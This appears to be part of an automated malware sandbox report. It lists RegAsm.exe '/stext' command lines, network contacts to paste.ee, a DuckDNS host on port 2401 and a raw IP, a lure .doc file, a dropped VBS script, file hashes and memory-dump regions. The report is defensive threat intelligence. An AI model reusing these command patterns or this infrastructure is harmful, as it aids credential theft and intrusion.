C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\qstdftmtgsdyzfkwabbkttwdn"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\amywflxncavljlgasmnmwyquokoj"

Network

Country Destination Domain Proto
US 8.8.8.8:53 2s.gg udp
FR 13.105.221.26:80 2s.gg tcp
FR 13.105.221.26:443 2s.gg tcp
US 154.38.188.98:80 154.38.188.98 tcp
FR 13.105.221.26:80 2s.gg tcp
FR 13.105.221.26:80 2s.gg tcp
FR 13.105.221.26:443 2s.gg tcp
FR 13.105.221.26:443 2s.gg tcp
US 154.38.188.98:80 154.38.188.98 tcp
US 154.38.188.98:80 154.38.188.98 tcp
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 188.114.97.2:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 154.38.188.98:80 154.38.188.98 tcp
US 8.8.8.8:53 lasteast.duckdns.org udp
NL 91.92.254.18:2401 lasteast.duckdns.org tcp
NL 91.92.254.18:2401 lasteast.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

memory/2892-1-0x000000007289D000-0x00000000728A8000-memory.dmp

memory/2892-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab5D9D.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar61BA.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/624-69-0x000000002FC81000-0x000000002FC82000-memory.dmp

memory/624-71-0x000000007289D000-0x00000000728A8000-memory.dmp

memory/624-73-0x0000000003690000-0x0000000003692000-memory.dmp

memory/2892-74-0x0000000002F40000-0x0000000002F42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{9751B3B7-7E2C-43C2-B681-86DEF0417091}

MD5 2490625e25b7e607cbdef848ba0a304b
SHA1 6fe92f24d2b2daf3c8e1538b4d16e155eb001b59
SHA256 d8874856d79e93ee69a05e17dcd8554c166b6e16623cc7c040f8df4ab02eed66
SHA512 96f6eed8aebb3bcb7dfb6a7f35fa57feef8223f4a2a90b8e62e7a29f7dd9cc10082ce5124a1bd926f874f01e7c0f2d4300743195b41c9c139bb966ebb437c0e1

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{48123BA5-C5A1-4886-8199-7D34F3DA3B53}.FSD

MD5 7f6f413ce20b48cd2c25dbd59d3544ba
SHA1 158c03f3e2552990aaa7a6006545cdd9fe5f1b79
SHA256 181f9ce21bbe318e87e3ff0e05bf9cf98231e5dc4c986198a4714f9e1663935d
SHA512 f49127856d9a0148d955fc4b147e33695e5489fafd6b707176aefc5206cf463ded7765ca267a1d5568182dbf4ae4496cfbbb0895cf26ba56c230d1fd22206f4b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 a8eab57689f17d581e4ecc05918ca2ff
SHA1 1bbe773fc962421d29b722948cf47c84986e6ec6
SHA256 e1842c35798c6d391c162cabd18f21eb49a258a71dfbdcf896bca28debc5826b
SHA512 f7339c3213ab2c1afb35d01cf4f24788f1827add56b41783db3498acbbeb71926d19f9c1e65407ea0ca664047e0af94a880f1c5992e3c7eb342514a245c79503

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{816C8E1F-50DF-44F3-A817-E6AE8D85C437}.FSD

MD5 0f8f96968407f7466d875d4ad6c17b2c
SHA1 d274173a14c38147554f2a6c9c4183548fae9565
SHA256 a4df84f4b68298b1ca454b1e23a4358c5e473842f485834271c6af22bf46bde9
SHA512 4cf307b6aa56351003aad6e1fe1e97398db436e948d42bc4a61e06b16bbd44dc01d9c42746ae9a2b3707eceac94c2769e6aad85958cd84e673f96c4e75246a86

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\23EIUNT7\kissinggreatwaytounderstandhowimkissingherwithlotofhearttounderstandyouaremygirliloveu_____sweethearttounderstandkissingmygirl[1].doc

MD5 338da1470f51aa8116271555ee990e96
SHA1 0e1cb790e5bc6534c8757794512a8394a1f12d13
SHA256 c02d7beb9210e4edc9fad4c7de3a6827994343e249d3f7544632d8f64847dc74
SHA512 00a79d3fb886066e5f701386e445457fa489b2a63083b75a2d8ae05965cdd21ac7a11dd5267950da882b4bd89d44860506cd650b57e138d96fff353b33919039

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_AD319D6DA1A11BC83AC8B4E4D3638231

MD5 e1a4145eaa8304bdadc78f305c2fb47a
SHA1 80e202a8894339e3a37ef82527c728699b357690
SHA256 c3e67a07f7c141e211bd7048801d634638bd688ac86e839b7dd880efa3e030b1
SHA512 d889ce90e1a131e6a99830b783fb3132402fc45ea03cdd5573a8e8b06bd5f213da3ec4db2bc937c020828cb4695a3420f132ad16165f7ea0a036903c111c6920

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_AD319D6DA1A11BC83AC8B4E4D3638231

MD5 fe9957a70857b1a647223e42e3113045
SHA1 2a9de2e884e46f01c8417e09d2d1b914b442f598
SHA256 faa00c989e870b03e92b015e51be69e2b71ef0feb9633f7764f117e4ae78b021
SHA512 1af8fe83d45311457caf685d55bf61988ca80a1ffcc16133a3a167c8c5a8b01ed629003aefda18c3f99a04476d212057ee6f7bc852240c3640432f17866447d1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\96DD3FB36E520A44B4555F9239BEA849_B4791CD67445EC7F0ECEA0014AB0ADA8

MD5 4a575578f56a0dc8e1f327f2506a9131
SHA1 84dd5df5851dae427605ed5187d3ef7331e7575b
SHA256 4beb4a8eb27e70d6d70573c74209e2e357c53ff746faba87e4c29a1cb0225388
SHA512 36ec4235d927985fccf3e015249f2d89387715e1e2bec388c1d62659d0f6ccb1423fb488de7ca9ec2399f60ecf3d4a9d094c9cc3eb416bff2958ddbd52aa5c29

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\96DD3FB36E520A44B4555F9239BEA849_B4791CD67445EC7F0ECEA0014AB0ADA8

MD5 7e144301ecb089ef2b6edc1aa9c426a6
SHA1 f387923342498e65d701f644fafd5f19dc3610f9
SHA256 6776418afb1112783f54beebbe05f75220f8f3fb816aaffd29c9eca1b493c2c9
SHA512 69b40c9d3870083414844cec5f76ba875a21a196f5a88322b834573b6017da6d247dcf2c1b71694c298284c1216add577a717ff4cf8f65bb680235d1771ecc0e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

MD5 e8f53904db1336034369e7073bcecb20
SHA1 b11d646ab2e2f445037218bdc8871c1c39561740
SHA256 da4572394335f59f8250420dec69844b42df76df29ca6ef614bb333324922f94
SHA512 60e044a438c5b99be3178b2460708b1a8f40097b471e5256a48221ae26ef8c1e96cf2b6a5147f81cf685aede4c2cc3b530257db037f9081d6c9ae3c039e8063b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

MD5 425b9a9fa4b19b9cd14d7528b7d37f3d
SHA1 f6be001f52342c55615aa32f6cb5f02e981befcd
SHA256 ee921fcd01ea9b3c1565f79de281d05601f1c2bf31afdcad53792f8242cc49cd
SHA512 2aec35a27e31b8ab26138b213b23957645e060647901876e77c6b5ea188912e634cf368d45073e7b9600fd380ed2bf2f609d762b49f337b48e10760eadd85698

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 30a2c37e41af5882796b9c4f496b559f
SHA1 47c3dd7cc562215b3958d184f13ef4e7b266e781
SHA256 e345687ebbff30ed3369b505f8208218a8d355803159aa0ea743fa242075ed7d
SHA512 3a4bccc122b3e8856771bf0e05a5417c7de24a8f074e357e19cc9b0d153bfe959e4d021b792ad32cabbc52b860ff1f4eb12ce30e8676a59241a6af6e4d7d3ca9

C:\Users\Admin\AppData\Roaming\createdkissingsomeone.vbs

MD5 5a00fbd90b552d6c44165a1b1ea8af3d
SHA1 88d2a19718dcc942adc92d30e274b9ae95ae84df
SHA256 fcef19600eb45805e23379e5f0adbcd1a35859aa01505af4cb17276af4d5443d
SHA512 9f7d33f47c8207653ae3a4ae76c86b27c281a86adae01633307592e2666cc9b4acdc118805c4e7a1e43ed16805fa7b100c3bfdafc06fd81794bd195b7a3252a7

memory/2892-191-0x000000007289D000-0x00000000728A8000-memory.dmp

memory/2320-193-0x00000000025B0000-0x00000000025F0000-memory.dmp

memory/2320-192-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2320-194-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/624-195-0x000000007289D000-0x00000000728A8000-memory.dmp

memory/2320-196-0x00000000025B0000-0x00000000025F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 cefed928671ae6c4645cb42d7003704f
SHA1 b2739dc5461b832ded1e0ed9ceec22844da3393b
SHA256 9aaee4905958b561bd91453e9f32bf87048f1da2e1af069d521d81b6fe70586b
SHA512 fdb987b7c269830527391e012dd2ef8d32d3cbc1156ab139d88fcae2492fccb3e4a1e69832be608da521a1f8d41d41d64339f5daaa243f5a511f781d3ae1e1c6

memory/2808-202-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2808-203-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2808-204-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2808-205-0x0000000002730000-0x0000000002770000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 acfc0b2988f94f54fc01dc0fb2a9c56c
SHA1 ec76c6d5d13888cd711566e7b5e97c8e713150f6
SHA256 79c12cecfef26d2b637946e2b0419b329cb239a62abdefd5912c9aa383a63afb
SHA512 fbdbae70a264f89c7850b6a3da087467fc6947e98ba3740f1ec4bdee9090df75137a0b4cad62b0e6fa80706535502ec0925322f2930f0923bedd4bc25307dd66

memory/2320-267-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2320-268-0x00000000025B0000-0x00000000025F0000-memory.dmp

memory/2808-269-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2808-270-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2808-271-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2808-272-0x0000000002730000-0x0000000002770000-memory.dmp

memory/112-274-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-276-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-278-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-282-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-283-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-281-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-280-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-284-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-285-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/112-287-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-289-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2808-291-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/112-293-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-292-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-294-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-295-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2320-296-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/112-297-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-298-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-299-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-300-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-302-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2780-305-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2780-308-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2764-307-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2764-316-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2780-312-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2368-317-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2764-324-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2368-323-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2780-322-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2780-321-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2764-311-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2764-328-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2368-326-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2764-330-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2368-331-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2368-332-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2368-333-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fqfseabstkltxywkrqgjjh

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2780-338-0x0000000000400000-0x0000000000478000-memory.dmp

memory/112-340-0x0000000010000000-0x0000000010019000-memory.dmp

memory/112-344-0x0000000010000000-0x0000000010019000-memory.dmp

memory/112-343-0x0000000010000000-0x0000000010019000-memory.dmp

memory/112-345-0x0000000010000000-0x0000000010019000-memory.dmp

memory/112-346-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2764-347-0x0000000000400000-0x0000000000462000-memory.dmp

memory/112-348-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-349-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-350-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-351-0x0000000010000000-0x0000000010019000-memory.dmp